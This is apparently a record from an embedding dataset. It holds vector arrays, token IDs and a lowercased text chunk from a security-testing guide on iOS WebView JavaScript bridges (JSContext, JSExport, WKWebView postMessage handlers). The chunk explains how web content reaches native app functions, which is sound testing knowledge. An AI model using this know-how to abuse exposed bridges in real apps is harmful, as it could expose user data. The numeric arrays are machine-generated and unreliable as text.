-0.40405765175819397, -0.29325637221336365, 0.4788394868373871, -0.24318276345729828, -0.7633355259895325, 0.31969302892684937, 0.037324804812669754, 0.5579903721809387, -0.009597242809832096, 0.6951326727867126, -0.06887272745370865, 0.735660970211029, -0.2374611645936966, -0.11774757504463196, -0.25929075479507446, -0.1754927784204483, -0.19634994864463806, -0.5209988951683044, 0.42564481496810913, -0.5553718209266663, 0.3401602506637573, 0.2700965702533722, -0.6588844656944275, -0.8270941972732544, 0.33138614892959595, -0.5055037140846252, -0.8834351301193237, 0.6529859900474548, 0.1733241230249405, -0.35446083545684814, -0.13148514926433563, 0.10459157824516296, 0.09416159987449646, 0.5859113335609436, -0.5288751125335693, -0.04883456975221634, -0.1410784125328064, -0.43366536498069763, -0.21843460202217102, 0.649929404258728, -0.6203551292419434, -0.18210390210151672, 0.12222796678543091, -1.3803908824920654, -0.9430782198905945, -0.26343974471092224, 0.026069961488246918, -0.09847363084554672, 0.5791326761245728, 0.5456637740135193, 0.5113190412521362, 0.8273330926895142, -0.5149562954902649, -0.22971929609775543, 0.4460168480873108, 0.6052054166793823, -0.25859320163726807, 1.0920472145080566, 0.12508125603199005, -0.3622410297393799, 0.02784760482609272, -0.02968168817460537, 0.42569699883461, 0.0189799964427948, -0.5387567281723022, -0.7291329503059387, 0.20461957156658173, -0.8217570185661316, -0.3417377471923828, 0.15457653999328613, 0.16824370622634888, 0.18783153593540192, -0.31776896119117737, -1.4510499238967896, 0.21949361264705658, -0.5042467713356018, 0.2203110009431839, 0.14389818906784058, 0.2281089574098587, 0.37029367685317993, 0.049406785517930984, 0.6680002212524414, -0.9915215373039246, 4.416670322418213, 0.4665113091468811, -0.12618228793144226, 0.18443135917186737, 0.406318336725235, 0.7468904256820679, 1.200968623161316, -0.5761932134628296, -0.1542576253414154, -0.0013705919263884425, 0.19253624975681305, -0.1616045981645584, 0.6745736598968506, 0.30913642048835754, 0.04193646460771561, 0.5384417176246643, -0.23746947944164276, -0.07098452746868134, -0.10975997149944305, -1.0680944919586182, -0.7878572940826416, -0.13465364277362823, -0.3231797218322754, 0.6854618191719055, 0.5349511504173279, -0.08812011033296585, 0.06797800958156586, -0.4655255377292633, -0.26533862948417664, -0.6392856240272522, 0.27866944670677185, -0.19172212481498718, 0.30908235907554626, -0.1828184872865677, -0.5837996602058411, -0.05652562156319618, 0.4368109703063965, -0.9006224870681763, -0.13801605999469757, 0.5771766304969788, 0.2418895661830902, -0.4064127504825592, 0.005794675555080175, -0.9969301819801331, 0.12672360241413116, 0.6388686299324036, -0.3487972021102905, -0.049440376460552216, 0.9312382936477661, -0.8808519244194031, 0.6062666773796082, 0.012150701135396957, 0.7505982518196106, 0.13144773244857788, -0.5574292540550232, 0.3639403283596039, 0.643727719783783, -0.1953134536743164, 0.09833864867687225, 0.1255992203950882, 0.8261604905128479, -0.36631256341934204, -0.003220164217054844, 0.17974017560482025, -0.9767900109291077, 0.4355032444000244, -0.4522557258605957, 0.40365734696388245, -0.37259331345558167, -0.1706138551235199, -0.7275376915931702, -0.22538340091705322, -0.2106110006570816, -0.44874340295791626, 0.9696117639541626, 0.1409602165222168, 0.03703070059418678, 0.6454585194587708, 0.5372464060783386, -0.4646143317222595, -0.11864471435546875, -0.6884255409240723, -0.333852082490921, 0.565954327583313, 0.8175007104873657, 0.5791006684303284, -0.13357394933700562, -0.6936119794845581, -0.3199443221092224, 0.3798435926437378, 0.2024802714586258, 0.2018422782421112, -0.1713709682226181, -0.0845867469906807, 0.41592270135879517 ]
[ 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1024, 6270, 8095, 5004, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1024, 1014, 10288, 8873, 7096, 11657, 15275, 6764, 1013, 1013, 2005, 2070, 3114, 2023, 18093, 2987, 1005, 1056, 2147, 999, 999, 1013, 1013, 2292, 2033, 2113, 2065, 2017, 2113, 2129, 2000, 4654, 8873, 7096, 11657, 2334, 6764, 2013, 1037, 1059, 2243, 8545, 2497, 8584, 3367, 4892, 1012, 8773, 1012, 2002, 2595, 2368, 16044, 1027, 3853, 1006, 1007, 1063, 13075, 2002, 2595, 1010, 1045, 1025, 13075, 2765, 1027, 1000, 1000, 1025, 2005, 1006, 1045, 1027, 1014, 1025, 1045, 1026, 2023, 1012, 3091, 1025, 1045, 1009, 1009, 1007, 1063, 2002, 2595, 1027, 2023, 1012, 25869, 16044, 4017, 1006, 1045, 1007, 1012, 2000, 3367, 4892, 1006, 2385, 1007, 1025, 2765, 1009, 1027, 1006, 1000, 2199, 1000, 1009, 2002, 2595, 1007, 1012, 14704, 1006, 1011, 1018, 1007, 1025, 1065, 2709, 2765, 1065, 13075, 1060, 8093, 1027, 2047, 20950, 11039, 25856, 2890, 15500, 1006, 1007, 1025, 1060, 8093, 1012, 2006, 16416, 5149, 9153, 15007, 22043, 1027, 3853, 1006, 1007, 1063, 2065, 1006, 1060, 8093, 1012, 3201, 9153, 2618, 1027, 1027, 20950, 11039, 25856, 2890, 15500, 1012, 2589, 1007, 1063, 13075, 1060, 8093, 2475, 1027, 2047, 20950, 11039, 25856, 2890, 15500, 1006, 1007, 1025, 1060, 8093, 2475, 1012, 2330, 1006, 1005, 2131, 1005, 1010, 1005, 8299, 1024, 1013, 1013, 19446, 2063, 2475, 2290, 2094, 2692, 2480, 2595, 4609, 2480, 14905, 2629, 2615, 8261, 17112, 2549, 3501, 2487, 2050, 19841, 2615, 2361, 1012, 20934, 14536, 26895, 7875, 6525, 4263, 1012, 5658, 1013, 1005, 1009, 1060, 8093, 1012, 3433, 18209, 1012, 2002, 2595, 2368, 16044, 1006, 1007, 1010, 2995, 1007, 1025, 1060, 8093, 2475, 1012, 4604, 1006, 19701, 1007, 1025, 1065, 1065, 1060, 8093, 1012, 2330, 1006, 1005, 2131, 1005, 1010, 1005, 5371, 1024, 1013, 1013, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 3968, 2549, 2063, 2692, 4215, 2620, 1011, 1042, 2581, 2546, 2581, 1011, 28941, 2620, 1011, 6109, 9468, 1011, 1039, 19481, 2692, 21472, 12376, 18139, 2050, 2629, 1013, 3075, 1013, 18394, 1013, 4012, 1012, 27280, 7011, 4014, 5397, 1012, 2073, 6491, 2100, 12618, 9333, 2121, 1012, 20228, 2923, 1005, 1010, 2995, 1007, 1025, 1060, 8093, 1012, 4604, 1006, 19701, 1007, 1025, 3128, 4725, 6086, 2083, 4773, 8584, 18719, 5897, 16380, 1021, 1010, 6207, 3107, 17928, 2015, 2008, 3499, 4807, 2090, 1996, 9262, 22483, 2448, 7292, 1999, 1996, 4773, 8584, 1998, 1996, 3128, 9170, 2030, 7863, 1011, 1039, 5200, 1012, 2045, 2024, 2048, 8050, 3971, 1997, 2129, 3128, 3642, 1998, 9262, 22483, 2064, 10639, 1024, 1046, 9363, 10111, 18413, 1024, 2043, 2019, 7863, 1011, 1039, 2030, 9170, 3796, 2003, 4137, 2000, 2019, 8909, 4765, 18095, 1999, 1037, 1046, 9363, 10111, 18413, 1010, 9262, 22483, 17345, 8073, 19735, 1996, 3796, 1999, 1037, 9262, 22483, 3853, 1012, 1046, 3366, 2595, 6442, 8778, 1024, 5144, 1010, 6013, 4725, 1998, 2465, 4725, 4161, 1999, 1037, 1046, 3366, 2595, 6442, 1011, 7900, 8778, 2024, 17715, 2000, 9262, 22483, 5200, 2008, 2024, 2800, 2000, 2035, 9262, 22483, 3642, 1012, 12719, 1997, 5200, 2008, 2024, 1999, 1996, 9262, 22483, 4044 ]
hack_tricks
435.txt
7
are reflected in the native environment. note that only class members defined in the jsexport protocol are made accessible to javascript code. look out for code that maps native objects to the jscontext associated with a webview and analyze what functionality it exposes, for example no sensitive data should be accessible and exposed to webviews. in objective - c, the jscontext associated with a uiwebview is obtained as follows : [ webview valueforkeypath : @ " documentview. webview. mainframe. javascriptcontext " ] javascript code in a wkwebview can still send messages back to the native app but in contrast to uiwebview, it is not possible to directly reference the jscontext of a wkwebview. instead, communication is implemented using a messaging system and using the postmessage function, which automatically serializes javascript objects into native objective - c or swift objects. message handlers are configured using the method add ( _ scriptmessagehandler : name : ). enabling javascriptbridgefunc enablejavascriptbridge ( _ enabled : bool ) { options _ dict [ " javascriptbridge " ]?. value = enabled let usercontentcontroller = wkwebviewconfiguration. usercontentcontroller usercontentcontroller. removescriptmessagehandler ( forname : " javascriptbridge " ) if enabled { let javascriptbridgemessagehandler = javascriptbridgemessagehandler ( ) usercontentcontroller. add ( javascriptbridgemessagehandler, name : " javascriptbridge " ) } } sending messageadding a script message handler with name " name " ( or " javascriptbridge " in the example above ) causes the javascript function window. webkit. messagehandlers. myjavascriptmessagehandler. postmessage to be defined in all frames in all web views that use the user content controller. it can be then used from the html file like this : function invokenativeoperation ( ) { value1 = document. getelementbyid ( " value1 " ). value value2 = document. getelementbyid ( " value2 " ). value window. webkit. messagehandlers. javascriptbridge. postmessage ( [ " multiplynumbers ", value1,
[ 0.2130831480026245, -0.3214738667011261, -0.25044718384742737, 0.8864442110061646, -0.3171691596508026, 0.5888562798500061, -0.41011354327201843, -0.1002720519900322, 0.48150986433029175, 0.7474740743637085, -0.4259621202945709, -0.1511429101228714, -0.16772139072418213, -0.5166985392570496, -0.2068711817264557, -0.12951074540615082, -0.9050770998001099, -0.02945893257856369, -1.2651573419570923, -0.043100472539663315, 0.47489023208618164, -0.1947515308856964, -1.1556754112243652, -1.0548022985458374, -0.6377607583999634, 0.9222807884216309, 0.8335966467857361, -0.0651114210486412, 0.7749128937721252, 0.7781652212142944, 0.385574072599411, 0.10125705599784851, -0.08093102276325226, -0.5456054210662842, 0.15262363851070404, -0.5040424466133118, 0.7631720900535583, -0.5186232328414917, -0.12848642468452454, -0.7051436901092529, 0.7181353569030762, -0.3191364109516144, -0.18337297439575195, -0.3550592362880707, -0.3616209924221039, 0.03661225736141205, 0.9021166563034058, 0.042226534336805344, 0.08605021983385086, -0.009316770359873772, 0.7836576104164124, 0.18961921334266663, -0.3066047132015228, 0.22832262516021729, 0.2565278112888336, 0.28300967812538147, -0.178424671292305, -0.13376198709011078, -0.40419796109199524, 0.48888593912124634, -0.15108081698417664, 0.7190406918525696, 0.26869189739227295, -0.8306356072425842, 0.1538621038198471, 0.13002488017082214, 0.019699590280652046, 0.21887636184692383, -0.1825033575296402, 0.13718630373477936, -0.3028862774372101, 0.7076126933097839, -0.8580431342124939, -0.5546967387199402, -0.4913810193538666, 0.3323715627193451, -0.3100302517414093, 0.18962442874908447, -0.4905065596103668, 0.19819985330104828, -0.3601608872413635, 0.8758873343467712, -0.10315404087305069, -0.3542569875717163, -0.5786822438240051, -0.36380359530448914, 0.19246698915958405, 0.6488905549049377, -0.6557251811027527, 0.5830264091491699, 0.08372650295495987, 0.6690192818641663, -0.8280189633369446, -0.05135038495063782, 0.6962547302246094, 0.4469379186630249, -0.08431818336248398, -0.17051158845424652, -0.015210204757750034, -0.41247910261154175, 0.4544786810874939, 0.3817600607872009, -0.2674906253814697, 0.5134652256965637, -0.18217772245407104, 0.3522350788116455, -0.16028538346290588, 0.14380475878715515, -0.4173946678638458, -0.5323801636695862, 0.36731666326522827, -0.202456533908844, -0.006115610245615244, -1.0004013776779175, -0.252393901348114, 0.41108396649360657, 0.4189036190509796, -0.08796296268701553, -0.4546353220939636, 0.9287910461425781, -0.2142273187637329, -0.6143290400505066, 0.8390117287635803, 0.10470087081193924, 0.4431114196777344, 0.7657233476638794, 0.4873146116733551, 0.7253240942955017, -0.3054126501083374, -0.032341230660676956, -0.17609289288520813, -0.19436831772327423, -0.09730425477027893, 0.5461677312850952, -0.6178565621376038, 0.4563314616680145, 0.0669667199254036, -0.08110033720731735, 0.6788604259490967, -1.1032001972198486, 0.22244411706924438, 0.4334854781627655, 0.1723983734846115, 0.6937866806983948, 0.3523959517478943, -0.0639987364411354, -0.6988179683685303, -0.015430385246872902, -0.05124891549348831, 0.028406551107764244, -0.24054276943206787, 0.1586769074201584, 0.4582592248916626, -0.6435468792915344, -0.5321014523506165, 0.11780664324760437, -0.101860411465168, 0.019727535545825958, -0.02230466902256012, -0.3269801735877991, -0.4780374765396118, 0.6190669536590576, -0.22802799940109253, -0.0828297883272171, -0.8890717625617981, 0.1877797693014145, -0.8347086906433105, -0.2892911732196808, -0.0496906116604805, 0.15084613859653473, 0.6575654149055481, -0.0038597937673330307, -0.2516990900039673, 0.3921317756175995, 1.4058915376663208, 0.5956286787986755, -0.04386270046234131, -0.06493571400642395, 0.0662730261683464, 0.3888764977455139, 0.007895280607044697, 0.7359127998352051, 0.1656285524368286, 0.6605340838432312, 0.09582570940256119, -0.1393565982580185, -0.14168965816497803, -0.2908049523830414, -0.038174670189619064, 0.07289344072341919, -0.19380822777748108, 0.398570716381073, -0.4431517422199249, 0.4454914629459381, 0.39125052094459534, 0.35886210203170776, -1.3716212511062622, 0.3003443479537964, -0.32514524459838867, -1.1655628681182861, -0.6455369591712952, 0.494019478559494, -0.1747022122144699, 0.39785563945770264, -0.46391725540161133, -0.18824312090873718, 1.0685745477676392, 0.5992727279663086, -0.4775749742984772, 0.9200336337089539, 0.3017553389072418, -0.6602124571800232, -0.5979785323143005, 0.31261712312698364, 0.3690979778766632, -0.015728162601590157, -0.6304379105567932, 0.2610284686088562, -0.14895664155483246, 0.5067421197891235, 0.7630208134651184, 0.7010800242424011, 0.5017156004905701, 0.6484824419021606, -0.8401753306388855, -0.2510983645915985, 0.19908998906612396, 0.5785048007965088, -0.36191144585609436, -0.4245511591434479, 0.5843398571014404, 0.17607924342155457, 0.3915001153945923, 0.9525081515312195, -0.1052781194448471, -0.3415161967277527, 0.08044403046369553, 0.8063152432441711, 0.3127325773239136, -0.02472185716032982, -0.2033427357673645, 0.5180040597915649, 0.5369435548782349, 0.40911510586738586, 0.4597647488117218, 0.07570737600326538, -0.21079464256763458, 0.19009102880954742, -0.1444993019104004, 0.9011512994766235, 0.04318772256374359, 0.5376912355422974, 0.9804866313934326, -0.0975172221660614, -0.518943727016449, -0.5947040319442749, 0.5914047360420227, 0.6434791088104248, -0.685570478439331, -0.8759839534759521, 0.13248145580291748, 0.43736180663108826, -0.5393229722976685, -0.2044033259153366, -0.28461191058158875, 0.4490194320678711, -0.0652642473578453, 0.447302907705307, -0.4637809991836548, -1.0515750646591187, -0.6345018744468689, -0.4883418381214142, -0.15639907121658325, 0.21211127936840057, -0.9724913239479065, -0.2421931028366089, 0.09293089807033539, -0.4211750626564026, 0.9200522303581238, -0.008089501410722733, -0.5526955127716064, -0.33899256587028503, 0.15485213696956635, 0.281945139169693, 0.04928210377693176, -0.026429539546370506, -0.5699703693389893, 0.2726012170314789, -0.12100402265787125, 0.9491400122642517, -0.2822086215019226, -0.1243087574839592, -0.27361372113227844, -0.039551325142383575, 0.1299486607313156, -0.2683731019496918, 0.7351064682006836, -0.011770382523536682, -0.5560762286186218, 0.029555832967162132, 0.04084864258766174, -0.5845471024513245, 0.4458419382572174, -0.05380644276738167, -0.8245953321456909, 0.2211865782737732, -0.16328947246074677, -0.18948675692081451, 1.0213547945022583, 0.5833007097244263, -0.3701893985271454, 0.1403731256723404, -0.1047249585390091, 0.23189745843410492, -0.7658255696296692, 0.5462130308151245, 0.03125729039311409, 0.6764270663261414, 0.16716398298740387, -0.22280102968215942, -0.12709927558898926, -0.2523755133152008, -0.25282761454582214, -0.5767689347267151, -0.20497997105121613, 0.401991069316864, 0.002166284713894129, -0.6188645958900452, 0.5719029903411865, -0.8209816813468933, -0.5712465047836304, 0.10007789731025696, -0.4650960862636566, 0.9958680868148804, 0.32967057824134827, 0.10264691710472107, 0.479825884103775, -0.43828848004341125, 0.04591301456093788, 0.38432326912879944, 0.10898904502391815, -0.4042530655860901, 0.572296142578125, -0.018041297793388367, -0.24016927182674408, 0.41860711574554443, 0.2863978445529938, -0.3090508282184601, 0.3232627213001251, -0.2938196063041687, -0.563372790813446, -0.6022654175758362, 0.13330751657485962, 0.21873551607131958, 0.2035437524318695, 0.8043182492256165, -0.3367805778980255, 0.10729076713323593, -0.09806149452924728, 0.3865688443183899, 0.659553050994873, -0.06897498667240143, -0.0518401674926281, 0.06539998203516006, -0.8391480445861816, -0.6020104885101318, 0.12333375960588455, 0.20362134277820587, -0.2246447056531906, 0.10558543354272842, 0.612494707107544, 0.05172941833734512, 0.1298820674419403, 0.428444504737854, -0.5310186147689819, -0.010118207894265652, 0.5740123391151428, -0.22337111830711365, 0.3257528841495514, -0.1016952320933342, 0.4098997712135315, -0.20222589373588562, -0.01691685989499092, 0.5920464396476746, 0.25942930579185486, -0.5877711772918701, -0.6786474585533142, 0.16511619091033936, 0.14435134828090668, -0.05231046676635742, 0.3478785753250122, -0.46460673213005066, 0.13179513812065125, -0.3515493869781494, -0.6215814352035522, -0.12531942129135132, 0.34077003598213196, 0.4630017876625061, -0.076424241065979, 0.28413352370262146, 0.6655706763267517, 0.17198090255260468, -0.6013343930244446, 0.6840886473655701, -0.5265106558799744, 0.4044518768787384, -0.6494576930999756, 0.592643678188324, 0.08676563203334808, 0.19769585132598877, 0.247154101729393, -0.2515873610973358, -0.024156883358955383, -0.34593531489372253, 0.3028874099254608, 0.0320192314684391, -0.7456395626068115, -0.1920037418603897, 0.7076717615127563, 0.2175314575433731, -0.6389905214309692, 0.08128643035888672, 0.16983960568904877, 0.40456971526145935, 0.6082247495651245, -0.6011474132537842, -0.2408272922039032, -0.7507796883583069, -0.08984582871198654, 0.333797812461853, 0.17862999439239502, -0.5289751887321472, -0.6498115658760071, -0.37737953662872314, -0.32745474576950073, 0.12557059526443481, 0.7242292165756226, -0.32177507877349854, 0.24947208166122437, -0.8531731963157654, -0.07225525379180908, 0.5530137419700623, -0.036733172833919525, -0.5151981711387634, -0.016116593033075333, 0.6173229217529297, 0.30014511942863464, 0.30484649538993835, -0.950140655040741, -0.11490163207054138, 0.29620450735092163, -0.7787027955055237, 0.19691643118858337, -0.8238316178321838, 0.09515879303216934, 0.28468382358551025, -0.0611509345471859, -0.38378456234931946, 0.18934814631938934, -0.4771347939968109, 0.08840105682611465, -0.2540014982223511, 0.12249481678009033, -0.33475279808044434, -0.03364169970154762, 0.7470088005065918, 0.3717518150806427, 0.2534777820110321, 0.3073127269744873, 0.7257448434829712, 0.26751312613487244, 0.40776652097702026, -0.5705576539039612, -0.02918184921145439, 0.6856749653816223, -0.543893575668335, 0.5309844613075256, 0.4437965452671051, -0.18165357410907745, 0.1460162252187729, -0.5385231971740723, 0.5125603675842285, -0.4185390770435333, 0.10904435813426971, -0.8679768443107605, -0.6749638319015503, -0.2700570523738861, 0.2309635877609253, 0.10390684753656387, 0.03742256015539169, -0.24355238676071167, -0.07150536775588989, 0.13303996622562408, 0.4131357669830322, -0.7411544322967529, -1.3383634090423584, -0.24128060042858124, -0.12182171642780304, -0.079526886343956, 0.05605477839708328, 1.1880090236663818, -0.408773809671402, -0.5036062598228455, 0.17348851263523102, 0.025535065680742264, 0.21076600253582, -0.7486913800239563, 0.128444105386734, -0.6572281718254089, 0.0143674211576581, -0.22045710682868958, 0.11741366237401962, 0.051427945494651794, 0.04392196983098984, 0.12003741413354874, 0.22835126519203186, 0.40406474471092224, -0.24260185658931732, -0.2598215937614441, 0.8402466773986816, 0.08181475102901459, -0.7316518425941467, 0.2396986037492752, 0.4552387595176697, -0.9307264089584351, -0.3140884339809418, -0.16670553386211395, -0.5313504934310913, -0.9615769982337952, -1.0375778675079346, 0.024668777361512184, -0.38059014081954956, 0.05292852222919464, -0.5018612742424011, 0.026407785713672638, 0.005514218471944332, 0.8677806854248047, -0.038617804646492004, -0.7547006607055664, -0.1155557930469513, 0.19016481935977936, 0.06793823838233948, -0.5158337950706482, 0.016663843765854836, 0.1090211272239685, -0.1196654811501503, -0.7326059341430664, 0.5304938554763794, 0.4562110900878906, 0.06892586499452591, -0.6657168865203857, -0.41155344247817993, 0.46376553177833557, -0.1288413256406784, -0.4050450026988983, -0.42341598868370056, -0.4237635135650635, 0.39526185393333435, -0.450134813785553, 0.273087739944458, -0.4509311318397522, 0.7828973531723022, 0.21493671834468842, -0.3350483179092407, 0.21095100045204163, -0.01098596304655075, 0.4845860004425049, -0.04901541769504547, 0.8089866042137146, -0.5073750019073486, -0.39176976680755615, -0.06283624470233917, 0.47546955943107605, 0.33675605058670044, -0.8281158804893494, -1.0744267702102661, 0.27025455236434937, -1.0802747011184692, -0.7989787459373474, 0.4606034755706787, -0.15824328362941742, -0.3001783788204193, -0.04162482172250748, -0.21360135078430176, 1.1413310766220093, -0.6473923325538635, 0.5253439545631409, 0.6063633561134338, 0.0904734656214714, 0.5437506437301636, -0.6207213401794434, 0.33443063497543335, 0.05031657963991165, -0.031395912170410156, 0.3836286664009094, 0.08769485354423523, 0.4825529456138611, -0.17046228051185608, -0.5249215960502625, 0.19859375059604645, -0.7981455326080322, -0.3932560682296753, 0.17035342752933502, -0.15548865497112274, 0.5316556692123413, 0.1634991616010666, -1.119616150856018, -0.4591686725616455, 0.05520978197455406, -0.12709243595600128, -0.11095880717039108, 0.6231284737586975, 0.4175425171852112, 0.4107126295566559, -0.6086426377296448, -0.008136448450386524, -0.7074620127677917, -0.24364301562309265, 0.5434268712997437, -0.22872549295425415, -0.5971046090126038, 0.5005117654800415, 0.44498932361602783, -0.49966713786125183, 0.1004481166601181, -0.19080166518688202, -0.2747258245944977, 0.29885417222976685, -0.3773612380027771, -0.42064300179481506, 0.5553075075149536, 0.39898812770843506, -0.4702130854129791, 0.20800065994262695, 0.38921913504600525, -0.21179720759391785, -0.431571364402771, 0.3060830235481262, -0.13039474189281464, 0.43337368965148926, 1.2694929838180542, -1.1573585271835327, -0.8052292466163635, -0.5757971405982971, -0.2804720401763916, 0.6018640398979187, -0.3879055380821228, 1.493941307067871, -0.9104133248329163, 0.2641197741031647, 0.18566051125526428, -0.3682991862297058, 0.6936449408531189, 0.20389379560947418, -0.0040543824434280396, 1.3379565477371216, 0.2070738822221756, -0.4358840584754944, -0.12270262837409973, 0.23941461741924286, 0.22647808492183685, -0.0011725296499207616, 0.011648209765553474, -0.15063926577568054, 0.15503638982772827, 0.26313161849975586, -0.05550988018512726, -0.3904630243778229, -1.0751702785491943, -0.7237816452980042, -0.05099320784211159, -0.10787409543991089, 0.33734557032585144, 0.20269957184791565, 0.47612422704696655, -0.07414484024047852, -0.5478549599647522, -0.13581645488739014, 0.7662815451622009, -0.27948108315467834, 0.20067788660526276, -0.41772863268852234, 0.2621382772922516, -0.7397377490997314, -0.4328311085700989, -0.22523657977581024, -0.33039429783821106, -0.4374910593032837, -0.61133873462677, -0.25802117586135864, -0.38561761379241943, -0.6470304131507874, 0.4037572741508484, -0.4963720142841339, 0.12288370728492737, -0.07959126681089401, -0.4179091453552246, 0.39059978723526, 0.5507867336273193, -0.016893582418560982, 0.27300113439559937, -0.3014821410179138, 0.0589824914932251, -0.4874802231788635, -0.31291186809539795, -0.29400351643562317, 0.20102252066135406, 0.12131118774414062, 0.44101810455322266, 0.526523232460022, 0.021152999252080917, 0.25008606910705566, 0.08831600844860077, -0.4955531060695648, -0.03363826498389244, 0.0856674313545227, 0.26155969500541687, 0.4545362889766693, -0.2956383228302002, 0.6493474841117859, 0.4776504337787628, 0.4581378698348999, 0.6247269511222839, -0.32190555334091187, 0.5648323893547058, 0.3763798773288727, -0.43998461961746216, -0.1978100836277008, -0.23629210889339447, 0.8511589169502258, -0.4079771935939789, 0.11605420708656311, 0.09403496235609055, -0.42586079239845276, 0.4387267827987671, -0.5209748148918152, 0.17103740572929382, -0.6360437273979187, -0.37149545550346375, 0.28831061720848083, 0.33434486389160156, 1.0464818477630615, -0.5631582736968994, 0.3903539180755615, -0.1556142121553421, -0.8340845704078674, 0.6564161777496338, -0.5877928137779236, 0.33228060603141785, 0.2219344973564148, -0.31895527243614197, -0.2739623785018921, -0.6162944436073303, 0.20339471101760864, -0.3931747078895569, 0.4197612404823303, 0.2327364981174469, 0.32002902030944824, -0.15529842674732208, 0.29907166957855225, 1.103859543800354, -0.667926013469696, -0.7081129550933838, -0.34090033173561096, 0.7527426481246948, -0.6529059410095215, -0.7648499608039856, -0.10306485742330551, 0.9668352603912354, 0.2781418263912201, -0.5590101480484009, -0.6755508184432983, -0.4354777932167053, 0.3190096616744995, 0.17687487602233887, -0.1970609575510025, -0.38711270689964294, -0.6676115393638611, 0.2760295271873474, -0.8917006850242615, -0.008404526859521866, -0.048331957310438156, -0.0960262343287468, 0.4115164875984192, 0.10948795080184937, -0.22851566970348358, 0.31351029872894287, 0.7125670313835144, 0.011820965446531773, 0.6026908159255981, 0.12789107859134674, 0.30978909134864807, 0.04274492338299751, -0.1660872995853424, -0.22919322550296783, -0.5448017716407776, 0.5320557951927185, 0.5710694193840027, 0.728026807308197, 0.28092262148857117, 0.5059357285499573, -0.8369061350822449, -0.42564627528190613, 0.31441396474838257, 0.1922321766614914, -0.36568018794059753, 0.2555241882801056, -0.11841050535440445, 0.17868900299072266, 0.21192538738250732, -0.5764333605766296, 0.5088676810264587, -0.10637236386537552, -0.02774416096508503, -0.4761987626552582, -0.5828836560249329, 0.8644068837165833, -0.5711730122566223, 0.597194254398346, -0.3063039183616638, -0.20340396463871002, 0.5681500434875488, 0.08754515647888184, -0.43461066484451294, 1.1328704357147217, 0.6943942904472351, 0.35452958941459656, 0.20252126455307007, 0.28412213921546936, -0.38143572211265564, 0.0637819692492485, 0.3482784628868103, -0.42691707611083984, -0.38712841272354126, 0.2711695730686188, -0.20567141473293304, -0.5586141347885132, -0.8720583319664001, 0.47761282324790955, 0.5780062079429626, 0.1881479024887085, 0.24195337295532227, 0.004137354902923107, 0.024009760469198227, -0.3238410949707031, 0.18514491617679596, -0.5414503812789917, -0.1304769665002823, 0.17799358069896698, -0.5939033031463623, -0.6782033443450928, 1.1302924156188965, -0.2807129919528961, 1.2282891273498535, 0.29743722081184387, 0.2950211763381958, -0.3431920111179352, 0.6386494636535645, -0.05410860851407051, -0.8345438241958618, -0.6917339563369751, 0.21382860839366913, -0.3002471625804901, -0.4278186857700348, -0.0029570097103714943, -0.1015588790178299, 0.16760210692882538, 0.11136922240257263, -0.5070977807044983, -0.9741926193237305, -0.03812958672642708, -0.5290024280548096, -0.8891633152961731, 0.3120858669281006, 0.48827868700027466, -0.7519003748893738, 0.14390671253204346, 0.02425818145275116, 0.5592214465141296, 0.18219093978405, -0.434370219707489, -0.3179105818271637, -0.04475010186433792, -0.5599110126495361, -0.33068567514419556, 0.7603883147239685, -0.3370462954044342, -0.03746510297060013, 0.7855075597763062, -0.9202871918678284, -0.8155529499053955, -0.40677452087402344, -0.2266504317522049, -0.44935140013694763, 0.6932011842727661, 0.20990706980228424, 0.8219588994979858, 0.5011662840843201, -0.6057381629943848, -0.24043966829776764, 0.36480918526649475, 0.5611625909805298, -0.3174731731414795, 0.8259061574935913, 0.642285943031311, -0.21860036253929138, -0.010563286952674389, 0.14005139470100403, 0.9569838643074036, -0.03362530842423439, -0.34521588683128357, -0.5301161408424377, -0.09782388061285019, -0.7709311842918396, -0.3912551701068878, -0.1867792308330536, -0.11696558445692062, -0.08475464582443237, 0.030304206535220146, -1.179602861404419, -0.06040208414196968, -0.3839057385921478, 0.4072740972042084, 0.07994536310434341, 0.39364662766456604, 0.6532156467437744, -0.1767445057630539, 0.4621151387691498, -1.2150341272354126, 4.394850730895996, 0.7172476053237915, -0.016526373103260994, 0.035028304904699326, 0.3214363157749176, 0.806024968624115, 1.1730833053588867, -0.8338688611984253, 0.22361548244953156, -0.31626182794570923, 0.2251034528017044, -0.8236448168754578, 0.8385085463523865, 0.6649392247200012, -0.11913804709911346, -0.05641341209411621, -0.7521454095840454, -0.1577877253293991, 0.0690564289689064, -0.9551764726638794, -1.0133707523345947, -0.22797557711601257, -0.4935794472694397, 0.5947800874710083, 0.7909728288650513, -0.08878792077302933, 0.015870055183768272, -0.632733166217804, 0.05570895969867706, -0.44828295707702637, 0.14789395034313202, -0.14819587767124176, 0.3288262188434601, -0.1311739832162857, -0.25486505031585693, -0.4553227722644806, 0.3164080083370209, -0.7336425185203552, -0.8013121485710144, 0.6018160581588745, 0.1783146858215332, -0.3039620816707611, 0.08771096915006638, -0.4261189103126526, 0.13573864102363586, 0.585611879825592, -0.6755712628364563, 0.40054255723953247, 0.7703455090522766, -0.4849831461906433, 0.7860825061798096, -0.05001278221607208, 0.8566558957099915, -0.02746773697435856, -0.166975736618042, 0.24774803221225739, 0.40825745463371277, -0.2772887051105499, -0.465274840593338, -0.22278742492198944, 0.7539401650428772, -0.8101539611816406, 0.02381298691034317, 0.35419851541519165, -0.7823992967605591, 0.5057122111320496, -0.7114335894584656, 1.0741454362869263, -0.16147838532924652, 0.2243715226650238, -0.6231343150138855, 0.029613042250275612, -0.7659183740615845, -0.42472952604293823, 0.9523237347602844, -0.37778976559638977, 0.050575487315654755, 0.8056544661521912, 0.8202297687530518, -0.5749002695083618, -0.34139150381088257, -0.1513691395521164, -0.981918454170227, 0.32633891701698303, 1.0158096551895142, 0.5143227577209473, -0.18835800886154175, -0.7423966526985168, 0.34971386194229126, 0.35310134291648865, 0.2161806970834732, 0.44863632321357727, -0.4649576246738434, -0.27978986501693726, 0.12261445075273514 ]
